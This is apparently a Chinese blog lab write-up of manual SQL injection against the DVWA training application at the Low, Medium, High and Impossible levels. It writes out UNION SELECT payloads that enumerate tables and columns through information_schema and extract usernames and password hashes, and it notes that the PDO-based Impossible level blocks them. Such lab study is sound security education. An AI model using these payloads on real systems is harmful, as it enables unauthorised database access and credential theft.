渗透测试实验_使用DVWA进行SQL手动注入 SQL手动注入的基本步骤 安全等级Low Medium High

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量6.2k 收藏 24
点赞数 6
分类专栏: 生产实习 文章标签: sql 数据库 web安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47133613/article/details/123578225
版权

文章目录

SQL手动注入

1. 前期数据准备

查看DVWA数据库的信息

  • 第一步:打开Windows2003虚拟机后,启动phpStudy
    在这里插入图片描述

  • 第二步:进入MySQL
    在这里插入图片描述

  • 第三步:查看数据库

  • 查看库名
    在这里插入图片描述

  • 选择数据库“dvwa”后,查看其中的表名
    在这里插入图片描述

  • 查看“dvwa“库中users表结构
    在这里插入图片描述

  • 查看users表中的username和password信息
    在这里插入图片描述

2. 前期实验准备

  • 第一步:先打开BurpSuite
    在这里插入图片描述
  • 第二步:再打开火狐浏览器的代理服务
    在这里插入图片描述
  • 第三步:在火狐浏览器中输入虚拟机IP,访问dvwa服务
    在这里插入图片描述

3. SQL手动注入的预备知识

以下内容引用自《sql手动注入常用步骤

原理
提起SQL注入,相信大家并不陌生,就是通过把SQL命令插入到Web表单提交输入域名页面请求查询字符串,最终达到欺骗服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互。
有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等

预备知识

  • 对MySQL数据库有一定了解;对基本的sql语句有所了解;
  • 对url编码有了解:空格=‘%20’,单引号=‘%27’,双引号=‘%22’,井号=‘%23’等

4. SQL手动注入的基本步骤

  1. 判断是什么类型注入,有没有过滤关键字,是否能绕过
  2. 确定存在注入的表的列数以及表中数据那些字段可以显示出来
  3. 获取数据库版本,用户,当前连接的数据库等信息
  4. 获取数据库中所有表的信息
  5. 获取某个表的列字段信息
  6. 获取相应表的数据

在这里插入图片描述
在这里插入图片描述

5. 实现SQL注入

  • 寻找SQL注入的方法
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
  • SQL注入的危害
    在这里插入图片描述

6. Low等级

在这里插入图片描述

  • 选择“Low”安全等级,再点击“SQL Injection”
    在这里插入图片描述在这里插入图片描述

  • 判断注入类型
    首先测试正常数据

    • 简单ID查询的正常功能体验:输入正确的User ID(例如1,2,3…),点击Submit,将显示ID First name,Surname信息。
    • 输入错误的不显示
      在这里插入图片描述

  • 遍历数据库表,遍历出了数据库中所有内容。

    • 尝试在正常数据后加上单引号,发现数据为空,加上注释符(注释符:#,–+ , //, – )后发现依旧可以正常输出,存在注入点。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据,那么有可能存在注入点。
1and1=1

在这里插入图片描述

1 and 1=2

在这里插入图片描述

  • 判断有几个字段
    • 在链接后面添加语句【 order by xx (数字任意)】,根据页面返回结果,来判断站点中的字段数目。
1order by 1 #

在这里插入图片描述

  • 联合查询显示位置
    • 在链接后面添加语句【 union select 1,2,3,4,5,6,7,8,9,10,11#】进行联合查询(联合查询时记得把前面的查询为空,“-1” )来暴露可查询的字段号。
1union select 1,2 #

在这里插入图片描述

  • 联合查询库名
    利用内置函数暴数据库信息
    version()版本;database()数据库;user()用户;
1union select version(),database() #

在这里插入图片描述

  • 联合查询表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

  • 联合查询表里面的列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

  • 联合查询users里面的用户名和密码
1' union select user,password from users #

在这里插入图片描述在这里插入图片描述

7. Medium等级

  • 先打开BurpSuite的代理
    在这里插入图片描述在这里插入图片描述
  • 输入1提交,得到的报文发送给Repeater
    在这里插入图片描述在这里插入图片描述
  • 修改报文中的id=2
    在这里插入图片描述
id=2 union select 1,table_name from information_schema.tables wheretable_schema=(select database())#

在这里插入图片描述

8. High等级

  • 先关闭BurpSuite的代理
    在这里插入图片描述在这里插入图片描述

  • 输入1
    在这里插入图片描述

  • 遍历数据

1and1=2

在这里插入图片描述

  • 查询回显位置
1' union select 1,3 #

在这里插入图片描述

  • 查询dvwa库中的表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

  • 查询数据库的版本号和当前连接的数据库名
1' union select version(),database() #

在这里插入图片描述

  • 查询dvwa库中users表的列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

  • 查询users表中user和password字段的数据
1' union select user,password from users #

在这里插入图片描述

9. Impossible等级

Impossible级别,代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入

  • 先关闭BurpSuite的代理,选择等级
    在这里插入图片描述

  • 输入1
    在这里插入图片描述

  • 判断注入类型,发现Impossible等级很难找到注入点

1 and 1=2
1and1=2

在这里插入图片描述在这里插入图片描述

  • 查询回显位置,发现无任何结果
1' union select 1,3 #

在这里插入图片描述

Outlook(^_^)
关注
  • 6
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL注入
WY92139010的博客
05-03 948
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3346
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
利用dvwa靶场深度学习sql注入攻击
hcufo的博客
01-18 268
sql注入详细过程及总结
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1213
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA通关详解初级
weixin_44831109的博客
03-16 2005
一、Brute Force(暴力破解)漏洞 (级别:low): 1.查看代码 可以看到,服务器只是验证了参数Login是否被设置,没有任何的防爆破机制 2.使用burpsuit抓包 3.单击Action发送到Intruder进行密码爆破 4.先清除 ,然后选中要爆破字段,点击添加 5.设置Payloads 6.点击右上角开始攻击 7.成功爆破 测试过程(级别:medium): 1.查看代码 从源码可以看到,与初级相比多出了红框框的内容,就是对一些特殊字符进行了转义还是与初级一样进行爆破
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1837
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
软件安全实验2 SQL注入实验
最新发布
06-19
1、借助Web漏洞教学和演练的开源免费工具DVWA,学习了解Web漏洞的原理及利用。 2、 DVWA(Damn Vulnerable Web Application)是一款用PHP+MySQL编写的...DVWA中将代码分为4种安全级别:LowMediumHigh、Impossible。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,LowMediumHigh 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
十三、kali windows DVWA搭建及测试
01-15
在网络安全领域,模拟真实环境进行渗透测试是提升技能的重要途径。 Damn Vulnerable Web Application (DVWA) 是一个由OWASP(Open Web Application Security Project)官方编写的PHP网站,专门设计用于教育目的,它...
《计算机网络安全实验实验报告1
11-01
【计算机网络安全实验实验报告1主要探讨了DVWA(Damn Vulnerable Web Application)中的PHP与MySQL环境下的SQL注入漏洞。该实验旨在让学生理解和掌握SQL注入的原理、利用方法以及防御措施。以下是实验涉及的主要...
web安全技术-实验六、文件上传漏洞.doc
08-20
6. **安全等级提升至"medium"**:在“medium”级别,DVWA可能会增加一些额外的防护措施,如限制文件扩展名或者检查文件内容。然而,利用工具如Burp Suite,可以截取和篡改网络请求,可能仍能绕过这些防护。 7. **...
DVWA练习——sql注入
haoaaao的博客
01-30 2607
一、sql injection (1)由于dvwa需要登录,因此直接无法获取数据库的内容,则需要在sql注入语句中添加网站的cookie以绕过登录 获取cookie: (2)sqlmap获取数据库: python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; securit..
DVWASQL注入
leo788的博客
07-26 325
使用sqlmap在dvwa进行简单的sql注入实验
DvwaSQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1029
SQL注入web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
DVWAlow级别sql注入
weixin_30349597的博客
07-13 373
将Security level设为low,在左侧列表中选择“SQL Injection”,然后在右侧的“User ID”文本框中输入不同的数字就会显示相应的用户信息。 我们首先需要判断这里所传输的参数是文本型还是数字型,分别输入3和1+2,观察它们显示的结果并不一致,因而就判断出参数类型是文本型 接下来用sqlmap注入 ,比较简单,不过要抓包抓cookie,因为这个是登陆后的...
DVWA手动SQL注入
weixin_36992674的博客
03-29 612
DVWA手动SQL注入 首先需要揣测这个sql语句是怎么写的,输入一个合法的id:1 .观察这里输出的信息 这里还需要判断select里有几个位置,所以我们用order by 进行尝试——输入1’ order by 5 –(注意这里–是两个-,而且最后面要加一个空格表示注释,没有空格是不生效的哟),最前面的'用来闭合单引号,最后面的--用来注释掉最后面的单引号 返回结果 再继续尝试3,2,发
DVWA SQL注入
m0_55605024的博客
03-01 499
简而言之,是在输入字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 595
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
DVWA 1.9 SQL注入详解:新手教程与实战步骤
文章介绍了SQL注入基本原理,以及如何手工进行SQL注入测试的步骤,强调了SQL注入仍然是常见且危害极大的Web漏洞。" SQL注入漏洞是网络安全中的一个重要话题,它允许攻击者通过在输入数据中嵌入恶意SQL代码,破坏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值